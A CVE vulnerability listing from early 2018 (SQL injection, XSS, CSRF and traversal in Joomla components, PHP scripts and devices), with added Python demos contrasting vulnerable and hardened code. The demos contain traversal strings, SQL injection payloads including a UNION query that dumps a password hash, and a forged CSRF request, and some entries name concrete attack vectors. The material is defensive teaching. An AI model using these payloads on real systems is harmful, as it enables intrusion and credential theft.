CVE-2018-0878 2.6
Windows Remote Assistance in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1 and RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, and 1709, Windows Server 2016 and Windows Server, version 1709 allows an
14-03-2018 - 13:29 14-03-2018 - 13:29
CVE-2018-7474 7.5
An issue was discovered in Textpattern CMS 4.6.2 and earlier. It is possible to inject SQL code in the variable "qty" on the page index.php.
14-03-2018 - 10:29 14-03-2018 - 10:29
CVE-2018-8096 7.5
Datalust Seq before 4.2.605 is vulnerable to Authentication Bypass (with the attacker obtaining admin access) via '"Name":"isauthenticationenabled","Value":false' in an api/settings/setting-isauthenticationenabled PUT request.
13-03-2018 - 20:29 13-03-2018 - 20:29
CVE-2018-1000094 6.5
CMS Made Simple version 2.2.5 contains a remote code execution vulnerability in File Manager that allows an authenticated admin with access to the file manager to execute code on the server. This attack appears to be exploitable via
12-03-2018 - 21:29 12-03-2018 - 21:29
CVE-2018-7538 7.5
A SQL injection vulnerability in the tracker functionality of Enalean Tuleap software engineering platform before 9.18 allows attackers to execute arbitrary SQL commands.
12-03-2018 - 17:29 12-03-2018 - 17:29
CVE-2018-8057 7.5
A SQL Injection vulnerability exists in Western Bridge Cobub Razor 0.8.0 via the channel_name or platform parameter in a /index.php?/manage/channel/addchannel request, related to /application/controllers/manage/channel.php.
11-03-2018 - 14:29 11-03-2018 - 14:29
CVE-2018-8056 5.0
Physical path leakage exists in Western Bridge Cobub Razor 0.8.0 via an invalid channel_name parameter to /index.php?/manage/channel/addchannel or a direct request to /export.php.
11-03-2018 - 14:29 11-03-2018 - 14:29
CVE-2018-7890 10.0
A remote code execution issue was discovered in Zoho ManageEngine Applications Manager before 13.6 (build 13640). The publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials by accessing a specifie
08-03-2018 - 17:29 08-03-2018 - 17:29
CVE-2017-15367 7.5
Bacula-web before 8.0.0-rc2 is affected by multiple SQL Injection vulnerabilities that could allow an attacker to access the Bacula database and, depending on configuration, escalate privileges on the server.
07-03-2018 - 15:29 07-03-2018 - 15:29
CVE-2018-7746 4.3
An issue was discovered in Western Bridge Cobub Razor 0.7.2. Authentication is not required for /index.php?/manage/channel/modifychannel. For example, with a crafted channel name, stored XSS is triggered during a later /index.php?/manage/channel requ
07-03-2018 - 12:29 07-03-2018 - 12:29
CVE-2018-7745 5.0
An issue was discovered in Western Bridge Cobub Razor 0.7.2. Authentication is not required for /index.php?/install/installation/createuserinfo requests, resulting in account creation.
07-03-2018 - 12:29 07-03-2018 - 12:29
CVE-2018-7739 7.5
antsle antman before 0.9.1a allows remote attackers to bypass authentication via invalid characters in the username and password parameters, as demonstrated by a username=>&password=%0a string to the /login URI. This allows obtaining root permissions
06-03-2018 - 21:29 06-03-2018 - 21:29
CVE-2018-7737 5.0
In Z-BlogPHP 1.5.1.1740, there is web site physical path leakage, as demonstrated by admin_footer.php.
06-03-2018 - 16:29 06-03-2018 - 16:29
CVE-2018-7736 4.3
In Z-BlogPHP 1.5.1.1740, cmd.php has XSS via the ZC_BLOG_SUBNAME parameter or ZC_UPLOAD_FILETYPE parameter.
06-03-2018 - 16:29 06-03-2018 - 16:29
CVE-2018-7653 4.3
In YzmCMS 3.6, index.php has XSS via the a, c, or m parameter.
04-03-2018 - 14:29 04-03-2018 - 14:29
CVE-2015-4117 6.5
Vesta Control Panel before 0.9.8-14 allows remote authenticated users to execute arbitrary commands via shell metacharacters in the backup parameter to list/backup/index.php.
28-02-2018 - 17:29 28-02-2018 - 17:29
CVE-2018-7477 7.5
SQL Injection exists in PHP Scripts Mall School Management Script 3.0.4 via the Username and Password fields to parents/Parent_module/parent_login.php.
28-02-2018 - 02:29 28-02-2018 - 02:29
CVE-2018-7490 5.0
uWSGI before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, allowing directory traversal.
26-02-2018 - 17:29 26-02-2018 - 17:29
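The uWSGI entry above, and the SecurEnvoy SecurMail traversal (CVE-2018-7705) earlier in the list, are both failures to confine a caller-supplied filename to an intended directory. The following is an added example, not code from uWSGI or SecurEnvoy, showing the shape of a weak document-root check beside a canonicalising one. The document root path is constructed and nothing needs to exist on disk; the percent-decoding, NUL rejection and root-relative handling of a leading slash are design choices of this example, not behaviour taken from either product.

```python
import os
from urllib.parse import unquote


def naive_in_docroot(docroot: str, requested: str) -> bool:
    """Weak check of the kind that leads to traversal bugs: a plain string-prefix
    test on the unnormalised path. '..' segments are never collapsed, so the
    prefix still matches and the request escapes the document root."""
    full = docroot.rstrip("/") + "/" + requested
    return full.startswith(docroot)


def resolve_in_docroot(docroot: str, requested: str):
    """Return the canonical filesystem path for `requested` if it lies inside
    `docroot`, else None. Decodes percent-encoding once, rejects NUL bytes,
    canonicalises both sides with realpath (which also follows symlinks) and
    compares path components rather than string prefixes."""
    root = os.path.realpath(docroot)
    decoded = unquote(requested)
    if "\x00" in decoded:
        return None
    # Treat a leading '/' as root-relative so '/etc/passwd' cannot be absolute.
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/")))
    # commonpath compares components: '/srv/www/html_backup' does not share
    # the root '/srv/www/html' even though it shares the string prefix.
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    DOCROOT = "/srv/www/html"  # constructed path for the demonstration
    for req in ("index.php", "css/../index.php", "../html_backup/db.sql",
                "%2e%2e/%2e%2e/etc/passwd", "/etc/passwd", "a\x00.php"):
        print(f"{req!r:32} naive={naive_in_docroot(DOCROOT, req)!s:5} "
              f"hardened={resolve_in_docroot(DOCROOT, req)}")
```

The naive check passes every request in the demonstration list, including the two that leave the document root; the hardened resolver returns None for those and for the NUL-byte name, and returns a canonical path only for names that stay under the root.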
CVE-2018-7448 8.5
Remote code execution vulnerability in /cmsms-2.1.6-install.php/index.php in CMS Made Simple version 2.1.6 allows remote attackers to inject arbitrary PHP code via the "timezone" parameter in step 4 of a fresh installation procedure.
26-02-2018 - 12:29 26-02-2018 - 12:29
CVE-2017-18195 5.0
An issue was discovered in tools/conversations/view_ajax.php in Concrete5 before 8.3.0. An unauthenticated user can enumerate comments from all blog posts by POSTing requests to /index.php/tools/required/conversations/view_ajax with incremental 'cnvI
26-02-2018 - 12:29 26-02-2018 - 12:29
CVE-2018-6859 7.5
SQL Injection exists in PHP Scripts Mall Schools Alert Management Script 2.0.2 via the Login Parameter.
23-02-2018 - 13:29 23-02-2018 - 13:29
CVE-2018-6868 3.5
Cross Site Scripting (XSS) exists in PHP Scripts Mall Slickdeals / DealNews / Groupon Clone Script 3.0.2 via a User Profile Field parameter.
23-02-2018 - 08:29 23-02-2018 - 08:29
CVE-2018-6867 3.5
Cross Site Scripting (XSS) exists in PHP Scripts Mall Alibaba Clone Script 1.0.2 via a profile parameter.
23-02-2018 - 08:29 23-02-2018 - 08:29
CVE-2018-6866 3.5
Cross Site Scripting (XSS) exists in PHP Scripts Mall Learning and Examination Management System Script 2.3.1 via a crafted message.
23-02-2018 - 08:29 23-02-2018 - 08:29
CVE-2018-7319 7.5
SQL Injection exists in the OS Property Real Estate 3.12.7 component for Joomla! via the cooling_system1, heating_system1, or laundry parameter.
22-02-2018 - 14:29 22-02-2018 - 14:29
CVE-2018-7318 7.5
SQL Injection exists in the CheckList 1.1.1 component for Joomla! via the title_search, tag_search, name_search, description_search, or filter_order parameter.
22-02-2018 - 14:29 22-02-2018 - 14:29
CVE-2018-7317 5.0
Backup Download exists in the Proclaim 9.1.1 component for Joomla! via a direct request for a .sql file under backup/.
22-02-2018 - 14:29 22-02-2018 - 14:29
CVE-2018-7316 7.5
Arbitrary File Upload exists in the Proclaim 9.1.1 component for Joomla! via a mediafileform action.
22-02-2018 - 14:29 22-02-2018 - 14:29
CVE-2018-7315 7.5
SQL Injection exists in the Ek Rishta 2.9 component for Joomla! via the gender, age1, age2, religion, mothertounge, caste, or country parameter.
22-02-2018 - 14:29 22-02-2018 - 14:29
CVE-2018-7314 7.5
SQL Injection exists in the PrayerCenter 3.0.2 component for Joomla! via the sessionid parameter, a different vulnerability than CVE-2008-6429.
22-02-2018 - 14:29 22-02-2018 - 14:29
CVE-2018-7312 7.5
SQL Injection exists in the Alexandria Book Library 3.1.2 component for Joomla! via the letter parameter.
22-02-2018 - 14:29 22-02-2018 - 14:29
CVE-2018-7300 10.0
Directory Traversal / Arbitrary File Write / Remote Code Execution in the User.setLanguage method in eQ-3 AG Homematic CCU2 2.29.2 and earlier allows remote attackers to write arbitrary files to the device's filesystem. This vulnerability can be expl
22-02-2018 - 14:29 22-02-2018 - 14:29
CVE-2018-7297 10.0
Remote Code Execution in the TCL script interpreter in eQ-3 AG Homematic CCU2 2.29.2 and earlier allows remote attackers to obtain read/write access and execute system commands on the device. This vulnerability can be exploited by unauthenticated att
22-02-2018 - 14:29 22-02-2018 - 14:29
CVE-2018-7313 7.5
SQL Injection exists in the CW Tags 2.0.6 component for Joomla! via the searchtext array parameter.
22-02-2018 - 09:29 22-02-2018 - 09:29
CVE-2018-6936 3.5
Cross Site Scripting (XSS) exists on the D-Link DIR-600M C1 3.01 via the SSID or the name of a user account.
21-02-2018 - 17:29 21-02-2018 - 17:29
CVE-2018-6941 6.8
A /shell?cmd= CSRF issue exists in the HTTPD component of NAT32 v2.2 Build 22284 devices that can be exploited for Remote Code Execution in conjunction with XSS.
20-02-2018 - 10:29 20-02-2018 - 10:29
CVE-2018-6940 4.3
A /shell?cmd= XSS issue exists in the HTTPD component of NAT32 v2.2 Build 22284 devices that can be exploited for Remote Code Execution in conjunction with CSRF.
20-02-2018 - 10:29 20-02-2018 - 10:29
CVE-2017-16356 4.3
Reflected XSS in Kubik-Rubik SIGE (aka Simple Image Gallery Extended) before 3.3.0 allows attackers to execute JavaScript in a victim's browser by having them visit a plugins/content/sige/plugin_sige/print.php link with a crafted img, name, or captio
20-02-2018 - 10:29 20-02-2018 - 10:29
CVE-2016-6272 5.0
XPath injection vulnerability in Epic MyChart allows remote attackers to access contents of an XML document containing static display strings, such as field labels, via the topic parameter to help.asp. NOTE: this was originally reported as a SQL inje
20-02-2018 - 10:29 20-02-2018 - 10:29
CVE-2018-6024 7.5
SQL Injection exists in the Project Log 1.5.3 component for Joomla! via the search parameter.
18-02-2018 - 15:29 18-02-2018 - 15:29
CVE-2018-7216 6.0
Cross-site request forgery (CSRF) vulnerability in esop/toolkit/profile/regData.do in Bravo Tejari Procurement Portal allows remote authenticated users to hijack the authentication of application users for requests that modify their personal data by
18-02-2018 - 01:29 18-02-2018 - 01:29
CVE-2018-7198 4.3
October CMS through 1.0.431 allows XSS by entering HTML on the Add Posts page.
17-02-2018 - 22:29 17-02-2018 - 22:29
CVE-2018-7180 7.5
SQL Injection exists in the Saxum Astro 4.0.14 component for Joomla! via the publicid parameter.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-7179 7.5
SQL Injection exists in the SquadManagement 1.0.3 component for Joomla! via the id parameter.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-7178 7.5
SQL Injection exists in the Saxum Picker 3.2.10 component for Joomla! via the publicid parameter.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-7177 7.5
SQL Injection exists in the Saxum Numerology 3.0.4 component for Joomla! via the publicid parameter.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-6585 7.5
SQL Injection exists in the JTicketing 2.0.16 component for Joomla! via a view=events action with a filter_creator or filter_events_cat parameter.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-6584 7.5
SQL Injection exists in the DT Register 3.2.7 component for Joomla! via a task=edit&id= request.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-6583 7.5
SQL Injection exists in the Timetable Responsive Schedule 1.5 component for Joomla! via a view=event&alias= request.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-6396 7.5
SQL Injection exists in the Google Map Landkarten through 4.2.3 component for Joomla! via the cid or id parameter in a layout=form_markers action, or the map parameter in a layout=default action.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-6394 7.5
SQL Injection exists in the InviteX 3.0.5 component for Joomla! via the invite_type parameter in a view=invites action.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-6373 7.5
SQL Injection exists in the Fastball 2.5 component for Joomla! via the season parameter in a view=player action.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-6372 7.5
SQL Injection exists in the JB Bus 2.3 component for Joomla! via the order_number parameter.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-6370 7.5
SQL Injection exists in the NeoRecruit 4.1 component for Joomla! via the (1) PATH_INFO or (2) name of a .html file under the all-offers/ URI.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-6368 7.5
SQL Injection exists in the JomEstate PRO through 3.7 component for Joomla! via the id parameter in a task=detailed action.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-6006 7.5
SQL Injection exists in the JS Autoz 1.0.9 component for Joomla! via the vtype, pre, or prs parameter.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-6005 7.5
SQL Injection exists in the Realpin through 1.5.04 component for Joomla! via the pinboard parameter.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-6004 7.5
SQL Injection exists in the File Download Tracker 3.0 component for Joomla! via the dynfield[phone] or sess parameter.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-5994 7.5
SQL Injection exists in the JS Jobs 1.1.9 component for Joomla! via the zipcode parameter in a newest-jobs request, or the ta parameter in a view_resume request.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-5993 7.5
SQL Injection exists in the Aist through 2.0 component for Joomla! via the id parameter in a view=showvacancy request.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-5992 7.5
SQL Injection exists in the Staff Master through 1.0 RC 1 component for Joomla! via the name parameter in a view=staff request.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-5991 7.5
SQL Injection exists in the Form Maker 3.6.12 component for Joomla! via the id, from, or to parameter in a view=stats request, a different vulnerability than CVE-2015-2798.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-5990 7.5
SQL Injection exists in the AllVideos Reloaded 1.2.x component for Joomla! via the divid parameter.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-5989 7.5
SQL Injection exists in the ccNewsletter 2.x component for Joomla! via the id parameter in a task=removeSubscriber action, a related issue to CVE-2011-5099.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-5987 7.5
SQL Injection exists in the Pinterest Clone Social Pinboard 2.0 component for Joomla! via the pin_id or user_id parameter in a task=getlikeinfo action, the ends parameter in a view=gift action, the category parameter in a view=home action, the uid pa
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-5983 7.5
SQL Injection exists in the JquickContact 1.3.2.2.1 component for Joomla! via a task=refresh&sid= request.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-5982 7.5
SQL Injection exists in the Advertisement Board 3.1.0 component for Joomla! via a task=show_rss_categories&catname= request.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-5981 7.5
SQL Injection exists in the Gallery WD 1.3.6 component for Joomla! via the tag_id parameter or gallery_id parameter.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-5980 7.5
SQL Injection exists in the Solidres 2.5.1 component for Joomla! via the direction parameter in a hub.search action.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-5975 7.5
SQL Injection exists in the Smart Shoutbox 3.0.0 component for Joomla! via the shoutauthor parameter to the archive URI.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-5974 7.5
SQL Injection exists in the SimpleCalendar 3.1.9 component for Joomla! via the catid array parameter.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-5971 7.5
SQL Injection exists in the MediaLibrary Free 4.0.12 component for Joomla! via the id parameter or the mid array parameter.
17-02-2018 - 02:29 17-02-2018 - 02:29
CVE-2018-5970 7.5
SQL Injection exists in the JGive 2.0.9 component for Joomla! via the filter_org_ind_type or campaign_countries parameter.
17-02-2018 - 02:29 17-02-2018 - 02:29
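Most of the Joomla! component entries above (CVE-2018-7312 through CVE-2018-5970), and the PHP Scripts Mall login and search entries elsewhere in the list, are the same defect: a request parameter concatenated into a SQL string. The following is an added example, not code from any of those components, using an in-memory SQLite database with constructed rows to show a concatenated search query being turned into a filter bypass and a UNION dump, beside the parameterised version that treats the same input as data. The table layout, row contents and payload strings are all constructed for the demonstration.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory database with constructed sample rows: one public and one
    internal project, plus a users table the search feature must never reach."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE projects (id INTEGER PRIMARY KEY, title TEXT, published INTEGER);
        INSERT INTO projects VALUES (1, 'Public roadmap', 1);
        INSERT INTO projects VALUES (2, 'Internal audit findings', 0);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO users VALUES (1, 'admin', 'constructed-hash-value');
    """)
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> list:
    """String concatenation: the search term is parsed as SQL, so a quote in
    the term ends the literal and the rest of the term becomes query text."""
    sql = ("SELECT title FROM projects WHERE published = 1 "
           "AND title LIKE '%" + term + "%'")
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn: sqlite3.Connection, term: str) -> list:
    """Bound parameter: the term is data. LIKE wildcards inside the term are
    escaped as well, so a user cannot widen the match with '%' or '_'."""
    escaped = term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = ("SELECT title FROM projects WHERE published = 1 "
           "AND title LIKE ? ESCAPE '\\'")
    return [row[0] for row in conn.execute(sql, ("%" + escaped + "%",))]


# Constructed payloads of the two shapes that dominate the list above:
# one that defeats the WHERE filter, one that reads a different table.
FILTER_BYPASS = "%' OR 1=1 -- "
UNION_DUMP = "x%' UNION SELECT username || ':' || password_hash FROM users -- "


if __name__ == "__main__":
    db = make_db()
    for term in ("roadmap", FILTER_BYPASS, UNION_DUMP):
        print(f"{term!r}")
        print("  concatenated :", search_vulnerable(db, term))
        print("  parameterised:", search_safe(db, term))
```

Against the concatenated query the first payload returns the unpublished row and the second returns the admin credential hash; the parameterised query returns only titles that literally contain the supplied text, which for both payloads is nothing.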
CVE-2018-7176 6.8
FrontAccounting 2.4.3 suffers from a CSRF flaw, which leads to adding a user account via admin/users.php (aka the "add user" feature of the User Permissions page).
15-02-2018 - 23:29 15-02-2018 - 23:29
CVE-2017-5799 6.5
A Remote Code Execution vulnerability in HPE OpenCall Media Platform (OCMP) was found. The vulnerability impacts OCMP versions prior to 3.4.2 RP201 (for OCMP 3.x), all versions prior to 4.4.7 RP702 (for OCMP 4.x).
15-02-2018 - 17:29 15-02-2018 - 17:29
CVE-2017-5798 4.3
A Remote Code Execution vulnerability in HPE OpenCall Media Platform (OCMP) was found. The vulnerability impacts OCMP versions prior to 3.4.2 RP201 (for OCMP 3.x), all versions prior to 4.4.7 RP702 (for OCMP 4.x).
15-02-2018 - 17:29 15-02-2018 - 17:29
CVE-2018-6928 7.5
PHP Scripts Mall News Website Script 2.0.4 has SQL Injection via a search term.
13-02-2018 - 12:29 13-02-2018 - 12:29
CVE-2018-6889 6.5
An issue was discovered in Typesetter 5.1. It suffers from a Host header injection vulnerability; using this attack, a malicious user can poison the web cache, perform advanced password reset attacks, or even trigger arbitrary user redirection.
11-02-2018 - 22:29 11-02-2018 - 22:29
CVE-2018-6888 6.0
An issue was discovered in Typesetter 5.1. The User Permissions page (aka Admin/Users) suffers from a critical cross-site request forgery (CSRF) flaw: using a forged HTTP request, a malicious user can lead a user to unknowingly create, delete or modify a
11-02-2018 - 22:29 11-02-2018 - 22:29
CVE-2018-6864 3.5
Cross Site Scripting (XSS) exists in PHP Scripts Mall Multi religion Responsive Matrimonial 4.7.2 via a user profile update parameter.
11-02-2018 - 22:29 11-02-2018 - 22:29
CVE-2018-6863 7.5
SQL Injection exists in PHP Scripts Mall Select Your College Script 2.0.2 via a Login Parameter.
11-02-2018 - 22:29 11-02-2018 - 22:29
CVE-2018-6862 3.5
Cross Site Scripting (XSS) exists in PHP Scripts Mall Bitcoin MLM Software 1.0.2 via a profile field.
11-02-2018 - 22:29 11-02-2018 - 22:29
CVE-2018-6861 3.5
Cross Site Scripting (XSS) exists in PHP Scripts Mall Lawyer Search Script 1.0.2 via a profile update parameter.
11-02-2018 - 22:29 11-02-2018 - 22:29
CVE-2018-6860 6.5
Arbitrary File Upload and Remote Code Execution exist in PHP Scripts Mall Schools Alert Management Script 2.0.2 via a profile picture.
11-02-2018 - 22:29 11-02-2018 - 22:29
CVE-2018-6858 3.5
Cross Site Scripting (XSS) exists in PHP Scripts Mall Facebook Clone Script.
11-02-2018 - 22:29 11-02-2018 - 22:29
CVE-2018-6845 4.3
PHP Scripts Mall Multi Language Olx Clone Script 2.0.6 has XSS via the Leave Comment field.
11-02-2018 - 22:29 11-02-2018 - 22:29
CVE-2018-6180 5.0
A flaw in the profile section of Online Voting System 1.0 allows an unauthenticated user to set an arbitrary password for other accounts.
08-02-2018 - 18:29 08-02-2018 - 18:29
CVE-2018-6655 3.5
PHP Scripts Mall Doctor Search Script 1.0.2 has Stored XSS via an arbitrary profile field.
07-02-2018 - 16:29 07-02-2018 - 16:29
CVE-2018-6610 5.0
Information Leakage exists in the jLike 1.0 component for Joomla! via a task=getUserByCommentId request.
05-02-2018 - 17:29 05-02-2018 - 17:29
CVE-2018-6609 7.5
SQL Injection exists in the JSP Tickets 1.1 component for Joomla! via the ticketcode parameter in a ticketlist edit action, or the id parameter in a statuslist (or prioritylist) edit action.
05-02-2018 - 17:29 05-02-2018 - 17:29
CVE-2018-6605 7.5
SQL Injection exists in the Zh BaiduMap 3.0.0.1 component for Joomla! via the id parameter in a getPlacemarkDetails, getPlacemarkHoverText, getPathHoverText, or getPathDetails request.
05-02-2018 - 16:29 05-02-2018 - 16:29
CVE-2018-6604 7.5
SQL Injection exists in the Zh YandexMap 6.2.1.0 component for Joomla! via the id parameter in a task=getPlacemarkDetails request.
05-02-2018 - 16:29 05-02-2018 - 16:29
CVE-2018-6582 7.5
SQL Injection exists in the Zh GoogleMap 8.4.0.0 component for Joomla! via the id parameter in a getPlacemarkDetails, getPlacemarkHoverText, getPathHoverText, or getPathDetails request.
05-02-2018 - 16:29 05-02-2018 - 16:29
CVE-2017-9414 6.8
Cross-site request forgery (CSRF) vulnerability in the Subscribe to Podcast feature in Subsonic 6.1.1 allows remote attackers to hijack the authentication of unspecified victims for requests that conduct cross-site scripting (XSS) attacks or possibly
05-02-2018 - 11:29 05-02-2018 - 11:29
CVE-2018-6398 7.5
SQL Injection exists in the CP Event Calendar 3.0.1 component for Joomla! via the id parameter in a task=load action.
30-01-2018 - 10:29 30-01-2018 - 10:29
CVE-2018-6397 5.0
Directory Traversal exists in the Picture Calendar 3.1.4 component for Joomla! via the list.php folder parameter.
30-01-2018 - 10:29 30-01-2018 - 10:29
CVE-2018-6395 7.5
SQL Injection exists in the Visual Calendar 3.1.3 component for Joomla! via the id parameter in a view=load action.
30-01-2018 - 10:29 30-01-2018 - 10:29
CVE-2018-6008 5.0
Arbitrary File Download exists in the Jtag Members Directory 5.3.7 component for Joomla! via the download_file parameter.
29-01-2018 - 00:29 29-01-2018 - 00:29
CVE-2018-6007 6.8
CSRF exists in the JS Support Ticket 1.1.0 component for Joomla! and allows attackers to inject HTML or edit a ticket.
29-01-2018 - 00:29 29-01-2018 - 00:29
CVE-2018-5720 6.8
An issue was discovered on DODOCOOL DC38 3-in-1 N300 Mini Wireless Range Extend RTN2-AW.GD.R3465.1.20161103 devices. A Cross-site request forgery (CSRF) vulnerability allows remote attackers to hijack the authentication of users for requests that mod
29-01-2018 - 00:29 29-01-2018 - 00:29
CVE-2017-17976 7.5
In Utilities.php in Perfex CRM 1.9.7, Unrestricted file upload can lead to remote code execution.
26-01-2018 - 15:29 26-01-2018 - 15:29
CVE-2017-14523 5.0
** DISPUTED ** WonderCMS 2.3.1 is vulnerable to an HTTP Host header injection attack. It uses user-entered values to redirect pages. NOTE: the vendor reports that exploitation is unlikely because the attack can only come from a local machine or from
26-01-2018 - 15:29 26-01-2018 - 15:29
CVE-2018-5973 7.5
SQL Injection exists in Professional Local Directory Script 1.0 via the sellers_subcategories.php IndustryID parameter, or the suppliers.php IndustryID or CategoryID parameter.
25-01-2018 - 12:29 25-01-2018 - 12:29
CVE-2018-5954 5.0
phpFreeChat 1.7 and earlier allows remote attackers to cause a denial of service by sending a large number of connect commands.
25-01-2018 - 11:29 25-01-2018 - 11:29
CVE-2017-1000474 7.5
Soyket Chowdhury Vehicle Sales Management System version 2017-07-30 is vulnerable to multiple SQL injection flaws in the login/vehicle.php, login/profile.php, login/Actions.php, login/manage_employee.php, and login/sell.php scripts, resulting in the exposure of u
24-01-2018 - 17:29 24-01-2018 - 17:29
CVE-2018-6193 2.6
A Cross-Site Scripting (XSS) vulnerability was found in Routers2 2.24, affecting the 'rtr' GET parameter in a page=graph action to cgi-bin/routers2.pl.
24-01-2018 - 16:29 24-01-2018 - 16:29
CVE-2018-6190 3.5
Netis WF2419 V3.2.41381 devices allow XSS via the Description field on the MAC Filtering page.
24-01-2018 - 16:29 24-01-2018 - 16:29
CVE-2018-5705 4.3
Reservo Image Hosting 1.6 is vulnerable to XSS attacks. The affected function is its search engine (the t parameter to the /search URI). Since there is a user/admin login interface, it's possible for attackers to steal sessions of users and thus adm
24-01-2018 - 12:29 24-01-2018 - 12:29
CVE-2018-5988 7.5
SQL Injection exists in Flexible Poll 1.2 via the id parameter to mobile_preview.php or index.php.
24-01-2018 - 05:29 24-01-2018 - 05:29
CVE-2018-5986 7.5
SQL Injection exists in Easy Car Script 2014 via the s_order or s_row parameter to site_search.php.
24-01-2018 - 05:29 24-01-2018 - 05:29
CVE-2018-5985 7.5
SQL Injection exists in the LiveCRM SaaS Cloud 1.0 component for Joomla! via an r=site/login&company_id= request.
24-01-2018 - 05:29 24-01-2018 - 05:29
CVE-2018-5984 7.5
SQL Injection exists in the Tumder (An Arcade Games Platform) 2.1 component for Joomla! via the PATH_INFO to the category/ URI.
24-01-2018 - 05:29 24-01-2018 - 05:29
CVE-2018-5979 7.5
SQL Injection exists in Wchat Fully Responsive PHP AJAX Chat Script 1.5 via the login.php User field.
24-01-2018 - 05:29 24-01-2018 - 05:29
CVE-2018-5978 7.5
SQL Injection exists in Facebook Style Php Ajax Chat Zechat 1.5 via the login.php User field.
24-01-2018 - 05:29 24-01-2018 - 05:29
CVE-2018-5977 7.5
SQL Injection exists in Affiligator Affiliate Webshop Management System 2.1.0 via a search/?q=&price_type=range&price= request.
24-01-2018 - 05:29 24-01-2018 - 05:29
CVE-2018-5976 6.8
Cross Site Request Forgery (CSRF) exists in RSVP Invitation Online 1.0 via function/account.php, as demonstrated by modifying the admin password.
24-01-2018 - 05:29 24-01-2018 - 05:29
CVE-2018-5972 7.5
SQL Injection exists in Classified Ads CMS Quickad 4.0 via the keywords, placeid, cat, or subcat parameter to the listing URI.
24-01-2018 - 05:29 24-01-2018 - 05:29
CVE-2018-5969 6.8
Cross Site Request Forgery (CSRF) exists in Photography CMS 1.0 via clients/resources/ajax/ajax_new_admin.php, as demonstrated by adding an admin account.
24-01-2018 - 05:29 24-01-2018 - 05:29
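The CSRF entries in this list (FrontAccounting's "add user", Typesetter's Admin/Users page, RSVP Invitation Online's account.php, Photography CMS's ajax_new_admin.php, among others) share one root cause: a state-changing endpoint that accepts any request carrying the victim's session cookie. The following is an added example, not code from any of those products, contrasting a handler that trusts the cookie alone with one that also requires POST, a same-origin Origin or Referer header, and a CSRF token bound to the session by HMAC. Requests and sessions are plain dicts constructed for the demonstration, the status codes stand in for a real framework's responses, and the signing secret is a constructed constant.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlparse

# Constructed server-side secret; a real deployment loads this from configuration.
CSRF_SECRET = b"constructed-csrf-signing-secret"


def issue_csrf_token(session_id: str) -> str:
    """Token = random nonce plus an HMAC binding that nonce to the session, so a
    token captured from one session is useless in another."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(CSRF_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def csrf_token_valid(session_id: str, token: str) -> bool:
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(CSRF_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def add_user_vulnerable(request: dict, session: dict) -> int:
    """Only the session cookie is checked. The browser attaches that cookie to a
    form post from any origin, so a forged cross-site request succeeds."""
    if not session:
        return 401
    return 200  # user created with attacker-supplied fields


def add_user_hardened(request: dict, session: dict, app_host: str) -> int:
    """Session cookie, safe-method rejection, origin check and a per-session
    CSRF token all have to pass before the account is created."""
    if not session:
        return 401
    if request["method"] != "POST":
        return 405
    origin = request["headers"].get("Origin") or request["headers"].get("Referer")
    if not origin or urlparse(origin).netloc != app_host:
        return 403
    if not csrf_token_valid(session["id"], request["form"].get("csrf_token", "")):
        return 403
    return 200  # user created


if __name__ == "__main__":
    victim = {"id": "sess-victim"}  # constructed session of a logged-in admin
    forged = {"method": "POST", "headers": {"Origin": "https://evil.example"},
              "form": {"username": "backdoor", "role": "admin"}}
    print("forged, cookie-only check :", add_user_vulnerable(forged, victim))
    print("forged, hardened handler  :", add_user_hardened(forged, victim, "forum.example"))
```

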